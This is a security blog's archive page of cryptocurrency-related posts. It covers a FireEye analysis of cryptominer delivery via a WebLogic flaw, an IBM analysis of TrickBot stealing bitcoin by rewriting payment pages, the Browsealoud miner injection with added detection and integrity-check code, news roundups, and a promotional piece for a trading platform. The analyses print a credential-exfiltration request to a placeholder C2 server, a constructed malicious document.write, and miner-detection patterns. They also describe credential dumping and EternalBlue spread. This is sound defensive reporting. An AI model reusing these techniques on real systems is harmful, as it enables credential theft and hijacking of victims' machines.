Category Archives: cryptocurrency

Combining Machine Learning and Cognitive Analysis for Profitable Cryptocurrency Trading

Fluctuations in the cryptocurrency market are seen by some people as a sign of instability, so they feel that the crypto ecosystem is unpredictable and should be avoided. For most traders and speculators, this is the best mood the market can be in, because huge swings also mean more opportunities to make a profit.

A market growing in complexity

Trading cryptocurrencies can be great, but it can also go very quickly from an informed investment practice to pure gambling. The huge profit-making opportunities exposed by the price swings and volatility of the crypto market seem to attract many new entrants, causing a boom in a market that is also growing in complexity.

The growing complexity of this market has given rise to more in-depth measures as traders try to find ways to keep winning trades consistently. Most of the time, in order to overcome human emotions and cognitive bias, traders have relied on the potential of machine intelligence.

Trading by automation

Powerful computational technology is systematically replacing traditional trading methods. These days, machine learning and computer algorithms are used to analyse and sometimes even execute trades. Bots with plug-in capabilities are attached to exchanges and execute trades around the clock based on instructions entered through their settings. These systems tend to function effectively as long as market cycles remain consistent, until certain human factors, such as the regulation attempts of early 2018, show up. At such points, these algorithms fail.

To address these gaps, Signals is building a platform for creating, training and monetizing crypto trading strategies through a user-friendly interface, accessible to anyone without any programming skills. Signals will connect crypto traders with data science developers.


Combining human and computer techniques

Signals seeks to empower crypto traders with state-of-the-art algorithms from the data science community, which will allow them to optimize their profits. The Signals Platform provides these tools in a user-friendly way, ranging from advanced charting and classic technical indicators to complex statistical models, crowd-wisdom-based inputs and machine learning algorithms based on media monitoring and sentiment analysis.

This process will connect data science developers with cryptocurrency traders in order to research and build a new crypto trading platform that is easy for everyone to use.

By using sophisticated machine learning techniques developed by data science specialists in the Czech Republic and ties to decentralized supercomputers, Signals will offer a simple UI for assembling indicators and creating signals to optimize profit on various cryptocurrency exchanges.

Beyond just trading

The platform provides an environment where anyone can build strategies from specific trading indicators, ranging from technical analysis to crowd wisdom insights, train them on historical data, and monetize such strategies by offering copy trading.

In summary, the Signals platform will be a marketplace of data-science-powered signals for trading cryptocurrencies. The platform also emphasizes the concept of smart technology, with a strong technological background (AI, algotrading, sentiment analysis, machine learning, potentially powered by a supercomputer).

Other benefits offered by the platform include educating traders to get rid of cognitive bias and make smarter decisions, while providing an environment to build and optimize smart trading strategies. This gives users an option to monetize their strategies and empowers them to make critical, transparent and well-informed investment decisions while reducing risk and creating the tools of tomorrow.

The post Combining Machine Learning and Cognitive Analysis for Profitable Cryptocurrency Trading appeared first on TechWorm.

This Week in Security News: Senate Hearings and Equifax Breaches

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, leaders of six security agencies testified before the Senate Intelligence Committee, the Equifax hack grew in severity, and hackers used the power of Machine Learning to spread malware.

Read on to learn more.


How Hackers Are Leveraging Machine Learning

As agencies and security professionals continue to dig deeper into machine learning capabilities, hackers are looking toward AI-based processes to boost the effects of cyberattacks. 

Vulnerabilities in Apache CouchDB Open the Door to Monero Miners

Attacks abusing cryptocurrency miners have been on an upswing — in large part due to the growing popularity of digital currencies. 

Lazarus Campaign and LoopX Scam Show That Cryptocurrency Industry Still Fraught With Dangers

The past weeks have seen a slew of cryptocurrency-related hacks. More specifically, one involved a new campaign by the threat actor known as the Lazarus Group, and the other involved a scam by one of the new cryptocurrency startups.

Cybersecurity is ‘greatest concern’ at Senate threats hearing

The leaders of six agencies, including the CIA, the NSA and the FBI, testified before the Senate Intelligence Committee on Tuesday as part of the committee’s annual “Worldwide Threats” hearing.

Driver’s license, credit card numbers: The Equifax hack is way worse than consumers knew

The Equifax data breach exposed more of consumers’ personal information than the company first disclosed last year, according to documents given to lawmakers. 

Russian accused of running Dark Web market nabbed in Thailand

Police in Thailand announced they have arrested a Russian national accused by U.S. authorities of running an online cybercrime marketplace.

Cryptojacking malware discovered running on critical infrastructure control systems

Radiflow reports that they discovered cryptojacking software — malware that mines cryptocurrency — running in the monitoring and control network of an unnamed European water utility.

Did any of these new cybersecurity developments surprise you? Let me know your thoughts below, or follow me on Twitter: @JonLClay.

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with the name “Update service for Oracle products1”. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).
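The scheduled-task names and miner flags listed above lend themselves to simple host-telemetry checks. The following is an added example (not FireEye's code) that parses process command lines for the flags the post describes and matches task names against the "Update service for Oracle products" pattern from Figures 4 and 5; the sample command lines, pool host and wallet value are constructed placeholders.

```python
"""Detection helpers for the PowerShell cryptominer behaviours described above.

Added example, not FireEye's code. It parses process command lines for
the miner flags the post lists (-a, -k, -o, -u, -p, -t) and matches
scheduled-task names against the "Update service for Oracle products"
pattern from Figures 4 and 5. All sample data below is constructed.
"""
import re
import shlex

# Short flags the post attributes to the observed miner binaries.
VALUE_FLAGS = {
    "-a": "algorithm",
    "-o": "pool_url",
    "-u": "wallet",
    "-p": "pool_password",
    "-t": "threads",
}
SWITCH_FLAGS = {"-k": "keepalive"}

# Both task names in the post share this prefix and differ only in the
# trailing character, so match the prefix plus at most one character.
TASK_NAME_RE = re.compile(r"^Update service for Oracle products.?$", re.IGNORECASE)

# stratum:// style URLs are specific to mining pools.
POOL_URL_RE = re.compile(r"^stratum\+(?:tcp|ssl)://", re.IGNORECASE)


def parse_miner_args(cmdline):
    """Extract the miner options present in a process command line."""
    try:
        # posix=False keeps Windows backslashes intact instead of treating them as escapes
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes; fall back to a whitespace split
        tokens = cmdline.split()
    found = {}
    i = 1  # token 0 is the executable path
    while i < len(tokens):
        tok = tokens[i]
        if tok in SWITCH_FLAGS:
            found[SWITCH_FLAGS[tok]] = True
        elif tok in VALUE_FLAGS and i + 1 < len(tokens):
            found[VALUE_FLAGS[tok]] = tokens[i + 1].strip('"')
            i += 1
        i += 1
    return found


def is_miner_cmdline(cmdline):
    """True when a pool URL is present together with corroborating miner options.

    A stratum pool URL alone is decisive. A plain http(s) -o URL needs at
    least two other miner options (wallet, password, algorithm, threads,
    keepalive) so that unrelated tools using -o for "output" are not flagged.
    """
    args = parse_miner_args(cmdline)
    pool = args.get("pool_url")
    if pool is None:
        return False
    if POOL_URL_RE.match(pool):
        return True
    return len(set(args) - {"pool_url"}) >= 2


def is_suspicious_task(task_name):
    """True for scheduled-task names matching the pattern from Figures 4 and 5."""
    return bool(TASK_NAME_RE.match(task_name.strip()))


def triage(process_cmdlines, task_names):
    """Return the command lines and task names that warrant investigation."""
    hit_procs = [c for c in process_cmdlines if is_miner_cmdline(c)]
    hit_tasks = [t for t in task_names if is_suspicious_task(t)]
    return hit_procs, hit_tasks


# Constructed sample telemetry (pool host and wallet are placeholders).
SAMPLE_CMDLINES = [
    r"C:\Windows\Temp\xmrig.exe -a cryptonight -k -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER -p x -t 2",
    r"C:\ProgramData\yam.exe -o http://pool.example.invalid:8080 -u WALLET_PLACEHOLDER -p x",
    r"C:\Program Files\Tool\gcc.exe -o build\app.exe main.c",
    r"C:\Windows\System32\svchost.exe -k netsvcs",
]
SAMPLE_TASKS = [
    "Update service for Oracle products1",
    "Update service for Oracle productsa",
    "Oracle Java Update Scheduler",
]

if __name__ == "__main__":
    procs, tasks = triage(SAMPLE_CMDLINES, SAMPLE_TASKS)
    for hit in procs:
        print("miner command line:", hit)
    for hit in tasks:
        print("suspicious scheduled task:", hit)
```

On a real host the inputs would come from process-creation events (e.g. Sysmon event ID 1 command lines) and a scheduled-task inventory rather than the constructed lists.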

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether it is running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with the extracted credentials, and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine whether it is vulnerable to EternalBlue, and uses the exploit to spread to that host.

After all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to those hosts.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage


Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

  • POWERSHELL DOWNLOADER (METHODOLOGY)
  • MONERO MINER (METHODOLOGY)
  • MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise


Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets

The TrickBot Trojan has been a rising global threat in the cybercrime arena ever since its emergence in late 2016. The organized cybergang that operates TrickBot has been widening its scope of activity to dozens of countries across the globe. It has been targeting financial entities, such as banks and credit providers, and focusing on business and private banking as it aims for hefty fraudulent transfer bounties.

But this is not where TrickBot’s diverse interests stop. As the value and popularity of cryptocurrency continues to rapidly rise, so does this cybergang’s interest in obtaining cryptocoins in the easiest way possible: theft. TrickBot configurations have featured popular cryptocurrency exchange URLs since about mid-2017, and we at IBM X-Force have been looking at the malware’s most recent attack schemes to steal coins from infected users.

There are several types of cryptocurrency platforms, each offering a variety of services, such as trading one coin for another, transferring coins between different wallets and buying coins with a credit card. According to our analysis, TrickBot is actively targeting one such service that enables users to purchase bitcoin and bitcoin cash by credit card.

The attacks we have looked into are facilitated by TrickBot’s webinjections, getting in the middle of the flow of a legitimate payment card transaction. In the normal payment scenario, a user looking to buy coins provides his or her public bitcoin wallet address and specifies the amount of bitcoin to purchase. When submitting this initial form, the user is redirected from the bitcoin exchange platform to a payment gateway on another domain, which is operated by a payment service provider. There, the user fills in his or her personal information, as well as credit card and billing details, and confirms the purchase of coins.

This is where TrickBot hijacks the coins. This particular attack targets both the bitcoin exchange website and that of the payment service to grab the coins and route them to an attacker-controlled wallet.


Webinjection Basics

The inner workings of TrickBot’s cryptocoin attack rely on an existing TrickBot attack tactic: webinjections. This age-old favorite tool of many banking Trojans is a form of man-in-the-browser attack that enables malware to modify webpages presented to the user. Malware authors achieve this by placing hooks on key application programming interface (API) functions inside the browser. These hooks intercept information going from and back to the browser and alter it midway.

The code that dictates which webpages should be attacked is usually not part of the malware’s executable code. Rather, it is in a configuration stored separately in the form of rules, each one defining which URL is to be modified and how. These rules usually contain large sections of malicious JavaScript code that is responsible for visually modifying the page, sending sensitive user information to the fraudulent server, etc.

Unlike most financial malware, TrickBot does not expose the injected code in the configuration itself. Instead, a web URL of a remote command-and-control (C&C) server corresponds with every targeted URL. This modus operandi is called serverside webinjection and has been used by TrickBot since its launch in 2016. Serverside webinjections allow TrickBot to modify the injected code on its server in real time without having to update the configuration on the infected machine.

The Target: Bitcoin

To see the attack rules TrickBot has in store for any targeted site, we must first access the configuration. TrickBot keeps its configuration encrypted on the infected machine. To read it and unveil the list of targeted entities, one can either decrypt the configuration file or inspect it in the browser’s memory after the malware has already decrypted it.

The relevant part of TrickBot’s configuration for this attack shows that the scheme involves two webpages that, together, make up the coin purchase process. The first is a page where the user provides his or her bitcoin wallet address and the desired amount of bitcoin to purchase. The second is a page where the payment process is executed.

In the image below, we can see the exact set of rules in TrickBot’s configuration, each one matching a targeted page with a URL on TrickBot’s server. This way, TrickBot fetches the appropriate webinjection to alter the legitimate transaction and do its bidding instead.


Figure 1: Attack rules in TrickBot’s configuration (source: X-Force Research)

To enable it to control the infected machine’s web browser, TrickBot’s modules are injected into the browser ahead of time and already have hooks in place to launch webinjections.


Figure 2: TrickBot dynamic link libraries (DLLs) loaded into the browser


Figure 3: PR_Read and PR_Write functions with TrickBot’s hooks in place

To view what was happening during the web session, we sniffed HTTP network traffic on the infected machine when opening the targeted URL. This revealed the attack flow of the malware’s dynamic injection method, which TrickBot refers to as “dinj.”

For every resource that TrickBot wishes to replace — an HTML page, a JavaScript or a CSS file — an HTTP POST request is sent to the C&C server with the following attributes of that resource:

  1. “sourcelink,” the complete URL of the resource to be replaced;
  2. “sourcequery,” the browser’s HTTP request for the resource (including all headers); and
  3. “sourcehtml,” the original code as would be returned by the legitimate host.

Injection No. 1: Gathering Victim Data

One of the resources TrickBot replaced is the HTML code of the bitcoin website. The code is being switched up to gather data on the victim’s cryptocoin wallet and the number of coins to be purchased.

Using Wireshark, we can see that the page is sent to TrickBot’s C&C and that the attack server returned a modified version.

Figure 4: HTTP packet capture of the targeted site being sent to the C&C


Figure 5: The injection request for the HTML page of the targeted site

To point out the injected script, we performed a simple diff between the original page source and the one returned by TrickBot’s C&C.


Figure 6: Diff between original HTML page and one returned by TrickBot

Flow of Events

The script first fetches an HTML element with ID “btcAddress.” This element is an input field in which the user fills in his or her wallet address. If this element is found on the page, the malware performs the following actions to alter the interaction with the targeted webpage:

  1. Any existing logic attached to the enter key (key code 13) is eliminated, probably to limit the form submission via keyboard and make sure the victim has to click a TrickBot-generated submit button.
  2. The original submit button is cloned, the new copy is placed in the HTML document object model (DOM) and the original button is hidden from the victim.
  3. A fraudulent form-submission process is registered to the new submit button with an event listener. Upon clicking, the wallet address and the desired amount of bitcoin entered by the user are fetched and sent to the malware server using an AJAX request.


Figure 7: Part of the injected code TrickBot used to hijack cryptocoin purchase transactions (code comments added by X-Force research)

The injection into the HTML page is used only to collect information. The attacker can use this information — the legitimate user’s bitcoin wallet address and the bitcoin amount to purchase — to decide whether to proceed with a fraudulent operation.

Later on, after being redirected to the payment process, TrickBot will gather more information. This is probably done to allow a future account takeover attack, which will enable the fraudsters to perform a purchase/coin transfer from a machine they control using the legitimate user’s wallet credentials and payment card details.

Injection No. 2: Stealing the Coins

The second phase of the TrickBot attack facilitates the theft of the cryptocoins by preying on the web logic defined by the payment provider for legitimate online transactions.

The actual bitcoin theft is once again facilitated by a webinjection that modifies another resource of the site, “bundle.js,” which contains most of the payment processing logic.


Figure 8: bundle.js is loaded by the original HTML page


Figure 9: The dynamic injection request to bundle.js

By checking the diff between the original version of bundle.js and the modified one, we noticed that the function sendPaymentRequest had been changed. This function is responsible for sending payment requests to the payment service provider, and it has been modified to contain a hardcoded bitcoin address instead of the one inserted by the user.


Figure 10: sendPaymentRequest before and after modification by TrickBot

The “walletaddress” attribute is the address of the bitcoin wallet to which the purchased coins will be delivered after the deal is complete. This injection ensures that the bitcoin will not be delivered to the original address provided by the victim, but to an address belonging to TrickBot’s operators.

From this point on, the victim is led through several steps of identification in which he or she provides a phone number, an email address, a selfie photo with the credit card he or she wants to use, and a photo of his or her national ID card.

However, these steps only serve to verify the personal identity and not the ownership of the wallet address. By now, the wallet address has already been set and will not be shown to the victim again. Thus, the victim’s credit card will be charged and he or she will believe the deal was successful, expecting to see the new coins in his or her wallet. The bitcoin will never reach the designated wallet, however, but will instead be delivered to a wallet belonging to one of TrickBot’s operators.

More to Come?

Having researched the attack tactics TrickBot applied to this cryptocurrency coin theft, we can see that, while it relies on existing mechanisms, the scheme required extensive research of the targeted sites, their web logic and the security controls they use. It highlights what we already know about this malware gang: It continues to study new targets and expand its reach.

As the theft of cryptocurrency becomes increasingly popular among financial malware operators, we expect to see many more campaigns targeting platforms and service providers in the cryptocurrency sector.

To mitigate the risk of financial malware, organizations can leverage the adaptive controls provided by IBM Trusteer’s Pinpoint Detect.

Indicators of Compromise

In this study, we used a TrickBot sample with MD5 039bc78ca0801006cc33485bc94f415c.


The post TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets appeared first on Security Intelligence.

Thousands of Websites Load Cryptocurrency Miner After Cybercriminals Compromise Third-Party Library

Thousands of websites secretly loaded a cryptocurrency miner that preys upon visitors after cybercriminals compromised a third-party library.

Security researcher Scott Helme reported the incident in a blog post that detailed how unknown actors changed one of the script files hosted by Texthelp, a provider of reading-assistive technology. Those malefactors targeted the Browsealoud web screen reader and altered it to include the CoinHive Monero miner.

“The ba.js had been altered to include a document.write call that added a CoinHive crypto miner to any page it was loaded in to,” Helme explained. In total, he found that the incident affected more than 4,000 websites, including many “prominent government websites” in the U.S. and U.K.

Swift Response

Helme reached out to Texthelp following his discovery, and the technology provider responded by temporarily disabling Browsealoud. It also issued a statement informing customers that it had implemented its “data security action plan” after learning of the issue. Texthelp went on to note that it had removed Browsealoud from all customer sites and mitigated any associated risk within four hours.

The U.K.’s Information Commissioner’s Office (ICO) took down its website Feb. 11 after learning it had been affected. The site remained offline the next day while the ICO investigated the incident.

Preventing Cryptocurrency Miner Attacks

The surge of cryptocurrency miner attacks in recent months calls for domain owners to strengthen the security of their websites. According to Helme, they can protect their sites against this particular attack type by adding the SRI Integrity Attribute, which enables the browser to determine whether a file has been modified. If someone has changed it, the browser won’t load the file.

Domain owners can take their website security one step further by implementing the Content Security Policy and the require-sri-for directive, Helme noted. Together, those measures prevent any script from loading on a hosted webpage without an SRI Integrity Attribute.
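As an added example (not code from Helme's post or from Texthelp), the following Python computes the SRI integrity value a site owner would pin on the script tag, emulates the browser's check, and shows that a copy of the file with an injected document.write no longer matches; the script contents and the CDN URL are constructed stand-ins.

```python
"""Subresource Integrity (SRI) check for a third-party script, as described above.

Added example, not from Helme's post or Texthelp. It computes the
integrity value a site owner places on the <script> tag for the
legitimate file, emulates the browser-side check, and demonstrates that
a tampered copy (constructed here with an injected document.write, the
pattern the post describes) no longer matches. All inputs are constructed.
"""
import base64
import hashlib

# Constructed stand-in for the legitimate ba.js; the real file is much larger.
ORIGINAL_JS = b"(function(){window.Browsealoud={enabled:true};})();\n"

# Constructed tampered copy: the same file plus a document.write that pulls
# in another script, which is the kind of modification the post describes.
TAMPERED_JS = ORIGINAL_JS + b'document.write("<script src=https://miner.example.invalid/lib.js></script>");\n'

# Only these digest algorithms are valid in an integrity attribute.
SRI_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(content, algorithm="sha384"):
    """Return the integrity attribute value ('<alg>-<base64 digest>') for content."""
    if algorithm not in SRI_STRENGTH:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(content, integrity):
    """Emulate the browser check: the fetched body must hash to a listed value.

    An integrity attribute may list several space-separated hashes. The
    browser considers only the strongest algorithm present and accepts the
    resource if the body matches any hash given for that algorithm.
    """
    by_alg = {}
    for candidate in integrity.split():
        alg, _, _ = candidate.partition("-")
        by_alg.setdefault(alg, []).append(candidate)
    if not by_alg:
        return False  # no integrity value at all: nothing to verify against
    strongest = max(by_alg, key=lambda a: SRI_STRENGTH.get(a, 0))
    if strongest not in SRI_STRENGTH:
        return False  # only unknown algorithms were listed
    return sri_hash(content, strongest) in by_alg[strongest]


def script_tag(src, content):
    """Build the <script> tag a site owner would publish for the pinned file."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            'crossorigin="anonymous"></script>')


# CSP directive named in the post: browsers that support require-sri-for
# refuse any script (or style) that lacks an integrity attribute.
CSP_HEADER = "Content-Security-Policy: require-sri-for script style"

if __name__ == "__main__":
    # Constructed placeholder URL, not the real hosting location of ba.js.
    tag = script_tag("https://cdn.example.invalid/ba.js", ORIGINAL_JS)
    pinned = sri_hash(ORIGINAL_JS)
    print(tag)
    print(CSP_HEADER)
    print("original loads:", sri_matches(ORIGINAL_JS, pinned))   # True
    print("tampered loads:", sri_matches(TAMPERED_JS, pinned))   # False
```

Note that require-sri-for was an experimental directive and is not supported by current browsers, so in practice the integrity attribute on each tag is the control that does the work.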

The post Thousands of Websites Load Cryptocurrency Miner After Cybercriminals Compromise Third-Party Library appeared first on Security Intelligence.

Hackers Exploit ‘Telegram Messenger’ Zero-Day Flaw to Spread Malware

A zero-day vulnerability has been discovered in the desktop version for end-to-end encrypted Telegram messaging app that was being exploited in the wild in order to spread malware that mines cryptocurrencies such as Monero and ZCash. The Telegram vulnerability was uncovered by security researcher Alexey Firsh from Kaspersky Lab last October and affects only the Windows client of Telegram

UK government websites infected by cryptocurrency miners

Hackers injected malicious code into a plug-in for the blind in order to mine the cryptocurrency Monero. In an attempt to mine cryptocurrency, hackers have injected malicious code into a

The post UK government websites infected by cryptocurrency miners appeared first on The Cyber Security Place.

Thousands of Government Websites Hacked to Mine Cryptocurrencies

There was a time when hackers simply defaced websites to get attention, then they started hijacking them to spread banking trojan and ransomware, and now the trend has shifted towards injecting scripts into sites to mine cryptocurrencies. Thousands of government websites around the world have been found infected with a specific script that secretly forces visitors' computers to mine

Cybersecurity week Round-Up (2018, Week 6)

Cybersecurity week Round-Up (2018, Week 6): let’s try to summarize the most important events that occurred last week in 3 minutes.

Cyber criminals continue to target cryptocurrency industry with malware and phishing attacks.

Security researchers at Netlab have spotted a new Android mining botnet, dubbed ADB.miner, that targets devices with ADB interface open.

An international law enforcement operation dismantled the crime ring behind the Luminosity RAT. US authorities also announced the takedown of the global cyber theft ring known as the Infraud Organization.

Good news for the popular British hacktivist Lauri Love: a UK court ruled that he will not be extradited to the US. The list of the hacker’s victims includes the FBI, the Federal Reserve Bank, NASA and the US Missile Defence Agency.

While Cisco and FireEye confirmed that a North Korean hacking group exploited the recently discovered Adobe Flash 0-day flaw, Adobe rolled out an emergency patch that fixed it.

A security researcher ported the three NSA exploits released by Shadow Brokers crew to Metasploit, including EternalRomance.

For the second time, Cisco issued a security patch to fix a critical vulnerability in the Cisco Adaptive Security Appliance. The company confirmed that threat actors are already attempting to exploit it in the wild.

While Intel releases new Spectre security updates, currently only for Skylake chips, VMware issues temporary mitigations for Meltdown and Spectre flaws.

The source code of the Apple iOS iBoot bootloader leaked online; while Apple downplays the leak, security experts warn that hackers could use it for a future jailbreak.

The Swisscom data breach hits 800,000 customers, roughly 10% of the Swiss population.

Crooks and experts devised new methods to exfiltrate data from compromised systems. Researchers at Forcepoint discovered a new piece of malware dubbed UDPOS that exfiltrates credit card data via DNS queries.

The week ended with the discovery of an unpatchable flaw in the Nintendo Switch bootROM by the fail0verflow hacker group, which exploited it to run Linux on the console.

This week a researcher at Trustwave disclosed many vulnerabilities in NETGEAR routers, and Lenovo patched critical flaws affecting Broadcom chipsets in dozens of Lenovo ThinkPad models.

https://youtu.be/wVrJF7H4n1k


Pierluigi Paganini

(Security Affairs – cybersecurity, cyberweek)

The post Cybersecurity week Round-Up (2018, Week 6) appeared first on Security Affairs.

Russian nuclear weapons engineers detained after using facility’s supercomputer to mine cryptocurrency

Reminiscent of the California Gold Rush, the cryptocurrency phenomenon has captured the minds of virtually everyone who understands digital currency. And those with the means to ‘mine’ it will go to great lengths to do so, as evidenced most recently by engineers at a nuclear weapons plant in Russia.

With direct access to 1 petaflop of computing horsepower and no apparent supervision, engineers at the Russian Federation Nuclear Center in Sarov – where the Soviets developed their first atom bomb in the 1940s – decided to make some easy money.

According to Russia’s Interfax News Agency, an unconfirmed number of engineers at the RFNC have been arrested for mining (or attempting to mine) cryptocurrency with “office computing resources.” Those resources were none other than the facility’s 1-petaflop supercomputer, which the institute uses to simulate nuclear tests.

One petaflop is a measure of computing speed equal to one quadrillion (10^15) floating-point operations per second (FLOPS). A machine reaches that rate by running thousands of individual processors in parallel.

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” said Tatyana Zalesskaya, head of RFNC public relations department.

In the cryptocurrency world, mining means validating transactions and appending them to the public ledger shared by everyone trading the currency. To do that, the mining computer has to exchange transactions and blocks with the rest of the network. In other words, it needs to use the Internet.

And that’s exactly what one of the detained engineers reportedly attempted to do, which triggered alarms at the country’s Federal Security Service (FSB) and led to the engineers’ arrest.

Because the institute’s supercomputer is designed to test top-secret nuclear arms, the Kremlin obviously doesn’t want an Ethernet cable anywhere near it. One can only imagine the potential repercussions of these engineers’ actions. Punishment will likely greatly exceed a slap on the wrist.

Litecoin Is the Second-Most Popular Cryptocurrency on the Dark Web, Study Finds

Litecoin is the second-most popular cryptocurrency among vendors that operate on the Dark Web, according to recent research.

Recorded Future analyzed 150 message boards, marketplaces and illicit services on the Dark Web and determined that 30 percent of these vendors currently accept Litecoin as an alternative payment system. Not far behind is Dash, another form of cryptocurrency, which is accepted by 1 in 5 digital underground merchants.

Meanwhile, bitcoin still enjoys universal acceptance among Dark Web vendors.

Litecoin Gaining Ground on Bitcoin

According to the report, bitcoin’s rise in popularity has strained the blockchain network, resulting in larger payment fees and rendering these payments “economically infeasible.” In addition, some criminals abuse the blockchain to try to double-spend their bitcoins.

Most vendors have responded by requiring three confirmations before marking a transaction as complete. Such a policy makes Dark Web bitcoin users jittery, especially if they’re purchasing illicit goods such as drugs or weapons.

Litecoin’s design targets a block time of 2.5 minutes, four times faster than Bitcoin’s 10 minutes, so transactions confirm more quickly, fees stay low and miners produce coins at a higher rate. Recorded Future asserted that these benefits could ultimately make Litecoin, or a similar cryptocurrency such as Dash, the top choice on the Dark Web within the next year.

Ryan Taylor, CEO of the Dash Core team, told SC Magazine he disagrees with that assessment, noting that the criminal underground doesn’t use his cryptocurrency. “Currently, less than 1 percent of transactions on the Dash network utilize the PrivateSend feature,” he said, “which contradicts the assertion that Dash is on the rise as a Dark Net payments alternative.”

The Growing Risk of Cryptocurrency Mining Attacks

If Litecoin continues to grow in popularity, ransomware authors will surely adopt the cryptocurrency. Bad actors will also begin using cryptocurrency mining attacks to generate new Litecoin, which could increase the number of organizations that will be affected by such incidents in the coming years.

The post Litecoin Is the Second-Most Popular Cryptocurrency on the Dark Web, Study Finds appeared first on Security Intelligence.

US and UK government websites hijacked to mine cryptocurrency on visitors’ machines

If undetected by a user’s security solution or content- or ad-blocker, the script ran in the background unbeknown to the user until the webpage was closed. A number of the affected websites, including that of the ICO, were also offline for hours in the aftermath of the attack.

The post US and UK government websites hijacked to mine cryptocurrency on visitors’ machines appeared first on WeLiveSecurity


Hackers hijack government websites with cryptocurrency mining malware

